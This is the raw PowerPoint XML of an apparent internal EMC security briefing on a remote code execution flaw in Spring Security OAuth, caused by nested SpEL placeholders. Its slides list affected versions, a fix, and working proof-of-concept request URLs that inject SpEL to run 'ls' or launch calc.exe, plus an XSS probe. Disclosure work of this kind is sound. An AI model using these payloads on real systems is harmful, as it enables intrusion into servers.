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  <p:sldMasterId id="2147483769" r:id="rId2"/>
    <p:sldMasterId id="2147483719" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId14"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId15"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="296" r:id="rId4"/>
    <p:sldId id="324" r:id="rId5"/>
    <p:sldId id="326" r:id="rId6"/>
    <p:sldId id="327" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="329" r:id="rId9"/>
    <p:sldId id="330" r:id="rId10"/>
    <p:sldId id="331" r:id="rId11"/>
    <p:sldId id="307" r:id="rId12"/>
    <p:sldId id="33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 &amp; Tips" id="{0395EFE8-F723-CB4F-A581-3D4E265E3626}">
          <p14:sldIdLst>
            <p14:sldId id="296"/>
            <p14:sldId id="324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Templates" id="{62E3A9FE-85A3-4E46-966F-50D83BE7F76D}">
          <p14:sldIdLst>
            <p14:sldId id="307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03">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="46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E7E7E7"/>
    <a:srgbClr val="339933"/>
    <a:srgbClr val="BA3030"/>
    <a:srgbClr val="8E908F"/>
    <a:srgbClr val="9D9FA2"/>
    <a:srgbClr val="828381"/>
    <a:srgbClr val="A5A6A5"/>
    <a:srgbClr val="717074"/>
    <a:srgbClr val="2C9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9719" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="158" d="100"/>
          <a:sy n="158" d="100"/>
        </p:scale>
        <p:origin x="144" y="144"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2903"/>
        <p:guide pos="46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notesViewPr>
    <p:cSldViewPr snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="-4352" y="-120"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="4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161507" y="8915400"/>
            <a:ext cx="534987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F7B6D393-E4E3-D143-A14E-086EC3E10D5C}" type="slidenum">
              <a:rPr lang="en-US" sz="800" smtClean="0">
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Verdana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gray">
          <a:xfrm>
            <a:off x="457200" y="228602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435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8863" y="685800"/>
            <a:ext cx="4740275" cy="2667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581400"/>
            <a:ext cx="5943600" cy="5265171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48102" y="8954292"/>
            <a:ext cx="361798" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720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3221F6-DF1F-4F4D-A457-D497032B3BDC}" type="slidenum">
              <a:rPr lang="en-US" sz="800" smtClean="0"/>
              <a:pPr marL="0" marR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 bwMode="gray">
          <a:xfrm>
            <a:off x="457200" y="228602"/>
            <a:ext cx="5943601" cy="460375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 algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" kern="120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latin typeface="Verdana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US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TITLE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46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spcBef>
        <a:spcPts val="1200"/>
      </a:spcBef>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="344488" indent="-117475" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:spcBef>
        <a:spcPts val="600"/>
      </a:spcBef>
      <a:buFont typeface="Arial"/>
      <a:buChar char="•"/>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="628650" indent="-174625" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:spcBef>
        <a:spcPts val="600"/>
      </a:spcBef>
      <a:buFont typeface="Lucida Grande"/>
      <a:buChar char="–"/>
      <a:tabLst/>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="973138" indent="-174625" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:spcBef>
        <a:spcPts val="600"/>
      </a:spcBef>
      <a:buFont typeface="Wingdings" charset="2"/>
      <a:buChar char="§"/>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1258888" indent="-117475" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:spcBef>
        <a:spcPts val="600"/>
      </a:spcBef>
      <a:buFont typeface="Lucida Grande"/>
      <a:buChar char="–"/>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana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  <a:latin typeface="+mn-lt"/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  <a:latin typeface="+mn-lt"/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  <a:latin typeface="+mn-lt"/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Federation Logo Lineup Jan201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60439"/>
            <a:ext cx="3524741" cy="2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1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RSA_NewLogo_Red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5023"/>
            <a:ext cx="52125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57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VCE_ECP_COLOR_v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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="379414" y="4556694"/>
            <a:ext cx="1028272" cy="3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 descr="Virtustream no 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4" y="4606926"/>
            <a:ext cx="980449" cy="21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7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7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rgbClr val="71707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18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6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4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4338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717074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717074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4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Federation Logo Lineup Jan2016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60439"/>
            <a:ext cx="3524741" cy="2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RSA_NewLogo_Red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5023"/>
            <a:ext cx="52125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Verdana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VCE_ECP_COLOR_v5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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="379414" y="4556694"/>
            <a:ext cx="1028272" cy="31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 descr="Virtustream no ta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614" y="4606925"/>
            <a:ext cx="999667" cy="2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7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600"/>
            <a:ext cx="8458200" cy="3429000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2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2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2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2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87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3886200"/>
            <a:ext cx="8383588" cy="413989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3200" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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2" y="4343400"/>
            <a:ext cx="8383587" cy="269994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2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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2380"/>
            <a:ext cx="3276600" cy="5141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663996" y="363539"/>
            <a:ext cx="5175204" cy="1751012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100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="2C95DD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63996" y="2440781"/>
            <a:ext cx="5175204" cy="81676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Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663996" y="3332938"/>
            <a:ext cx="5175204" cy="35795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1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent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8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5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84582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1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85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4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432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5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42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379413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4809067" y="1011766"/>
            <a:ext cx="4038600" cy="3526897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1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="169863" indent="-169863">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="515938" indent="-168275">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="­"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="8556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4pPr>
            <a:lvl5pPr marL="1201738" indent="-168275">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/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89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3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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="990599"/>
            <a:ext cx="4038600" cy="3548063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4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deration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413" y="4652729"/>
            <a:ext cx="3527597" cy="29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0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votal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1" name="Picture 20" descr="Pivotal gre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9151"/>
            <a:ext cx="787466" cy="1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9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SA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2" name="Picture 1" descr="RSA_NewLogo_Red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113" y="4625023"/>
            <a:ext cx="521257" cy="1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8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FFFFFF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FFFFFF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FFFFFF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FFFFFF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7" name="Picture 6" descr="VCE_ECP_WHITE_v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86" y="4560859"/>
            <a:ext cx="12192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rtustream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accent4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394" y="4606925"/>
            <a:ext cx="996249" cy="2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7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Mware co-bra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VMware logo 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513" y="4629149"/>
            <a:ext cx="1045441" cy="158968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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chemeClr val="bg1"/>
                </a:solidFill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chemeClr val="bg1"/>
                </a:solidFill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chemeClr val="bg1"/>
                </a:solidFill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chemeClr val="bg1"/>
                </a:solidFill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rgbClr val="BABCBE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0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MC logo white_300dpi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2997" y="1657351"/>
            <a:ext cx="4899905" cy="15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3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379413" y="1295399"/>
            <a:ext cx="8458200" cy="3235325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graphic area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990599"/>
            <a:ext cx="6096000" cy="35480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990600"/>
            <a:ext cx="2133600" cy="35480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6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graphic area a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2743200" y="1295399"/>
            <a:ext cx="6096000" cy="3243264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="717074"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="717074"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1084263" indent="-169863">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="717074"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1430338" indent="-168275">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="717074"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1770063" indent="-169863">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:srgbClr val="717074"/>
                </a:solidFill>
                <a:latin typeface="+mn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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1295400"/>
            <a:ext cx="2133600" cy="32432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379413" y="228600"/>
            <a:ext cx="8458200" cy="428625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00000"/>
              </a:lnSpc>
              <a:defRPr sz="2800" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Verdan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413" y="657225"/>
            <a:ext cx="8449733" cy="30241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1600" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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35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4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20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59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  <a:latin typeface="+mn-lt"/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 bwMode="gray">
          <a:xfrm>
            <a:off x="366714" y="5033041"/>
            <a:ext cx="216726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" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>© Copyright 2016 EMC Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1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4610353"/>
            <a:ext cx="62179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8" r:id="rId11"/>
    <p:sldLayoutId id="2147483794" r:id="rId12"/>
    <p:sldLayoutId id="2147483795" r:id="rId13"/>
    <p:sldLayoutId id="2147483765" r:id="rId14"/>
    <p:sldLayoutId id="2147483764" r:id="rId15"/>
    <p:sldLayoutId id="2147483763" r:id="rId16"/>
    <p:sldLayoutId id="2147483767" r:id="rId17"/>
    <p:sldLayoutId id="2147483817" r:id="rId18"/>
    <p:sldLayoutId id="2147483766" r:id="rId19"/>
    <p:sldLayoutId id="2147483768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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5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4610353"/>
            <a:ext cx="62179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9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3" r:id="rId11"/>
    <p:sldLayoutId id="2147483796" r:id="rId12"/>
    <p:sldLayoutId id="2147483797" r:id="rId13"/>
    <p:sldLayoutId id="2147483804" r:id="rId14"/>
    <p:sldLayoutId id="2147483803" r:id="rId15"/>
    <p:sldLayoutId id="2147483802" r:id="rId16"/>
    <p:sldLayoutId id="2147483806" r:id="rId17"/>
    <p:sldLayoutId id="2147483818" r:id="rId18"/>
    <p:sldLayoutId id="2147483805" r:id="rId19"/>
    <p:sldLayoutId id="2147483793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801100" y="5033041"/>
            <a:ext cx="28575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">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="r"/>
            <a:fld id="{61F684CE-B7BB-4223-BA2B-B47808B845F1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr lvl="0" algn="r"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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366714" y="5033041"/>
            <a:ext cx="1676741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600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>EMC CONFIDENTIAL—INTERNAL USE ONLY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="EMC-Tab-RGB.jp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7869" y="4610353"/>
            <a:ext cx="621792" cy="53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02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3" r:id="rId11"/>
    <p:sldLayoutId id="2147483800" r:id="rId12"/>
    <p:sldLayoutId id="2147483801" r:id="rId13"/>
    <p:sldLayoutId id="2147483814" r:id="rId14"/>
    <p:sldLayoutId id="2147483813" r:id="rId15"/>
    <p:sldLayoutId id="2147483812" r:id="rId16"/>
    <p:sldLayoutId id="2147483816" r:id="rId17"/>
    <p:sldLayoutId id="2147483820" r:id="rId18"/>
    <p:sldLayoutId id="2147483815" r:id="rId19"/>
    <p:sldLayoutId id="2147483743" r:id="rId20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utterstock_73190095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976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032077"/>
            <a:ext cx="9144000" cy="953309"/>
          </a:xfrm>
          <a:prstGeom prst="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RCE IN SPRING SECURITY OAUTH 1&amp;2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Oct, 13th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hutterstock_73190095.jp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39766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032077"/>
            <a:ext cx="9144000" cy="953309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="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6200000" scaled="0"/>
            <a:tileRect/>
          </a:gra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RCE IN SPRING SECURITY OAUTH 1&amp;2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Oct, 13th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OAuth authorization request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whitelabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Error Page (HTTP 500 code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>response_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> parameters are used inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SpEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> placeholders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SpEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> resolves nested placeholders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>${${message}}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 Description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044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Legit request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smtClean="0"/>
              <a:t>localhost:8080/oauth/authorize?response_type=token</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;client_id=secalert&amp;scope=openid&amp;redirect_uri=http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>://localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whitelabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Error Page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>http://localhost:8080/authorize?response_type=token</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>client_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>secalert&amp;scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>openid&amp;redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=&lt;s&gt;XSS&lt;/s&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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code execution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9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689545" y="1131898"/>
            <a:ext cx="5829467" cy="32353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code execution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problem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844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code execution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problem</a:t>
            </a:r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4" y="1542906"/>
            <a:ext cx="5677692" cy="2057687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379413" y="1407414"/>
            <a:ext cx="8458200" cy="30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45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79413" y="1085850"/>
            <a:ext cx="8458200" cy="3235325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>localhost:8080/oauth/authorize?response_type=token</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>client_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>secalert&amp;scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>openid&amp;redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>T(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>java.lang.Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>().exec("ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>")}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>localhost:8080/oauth/authorize?response_type=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>${T%28java.lang.Runtime%29.getRuntime%28%29.exec%28toString%28%29.substring%28112,120%29%29}&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>client_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>secalert&amp;scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>openid&amp;redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=http://test</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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Remote code execution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Exploit usage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583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Pivotal Spring Security OAuth 2.0 - 2.0.9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pivotal Spring Security OAuth 1.0 - 1.0.5</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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Affected version</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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1289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133113" y="1295400"/>
            <a:ext cx="4950799" cy="323532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FIX</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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RESTRICTION ON USAGE OF NESTED PLACEHOLDERS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417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33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6 EMC Templat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marL="0">
          <a:defRPr sz="1600" dirty="0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2016 internal white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2016 internal black">
  <a:themeElements>
    <a:clrScheme name="2014 v4">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="2C95DD"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="717074"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="2C95DD"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="339933"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="93C5FF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="BABCBE"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="007D68"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="CE3131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sng">
          <a:solidFill>
            <a:schemeClr val="bg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EMC 2014">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="2C95DD"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="717073"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="2C95DD"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="007D68"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="93C5FF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="BABCBE"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8E908F"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FF0000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2C95DD"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2C95E1"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Adjacency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Lab02</Template>
  <TotalTime>47</TotalTime>
  <Words>100</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)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Lucida Grande</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>2016 EMC Template</vt:lpstr>
      <vt:lpstr>2016 internal white</vt:lpstr>
      <vt:lpstr>2016 internal black</vt:lpstr>
      <vt:lpstr>RCE IN SPRING SECURITY OAUTH 1&amp;2</vt:lpstr>
      <vt:lpstr>Exploit Description</vt:lpstr>
      <vt:lpstr>Remote code execution</vt:lpstr>
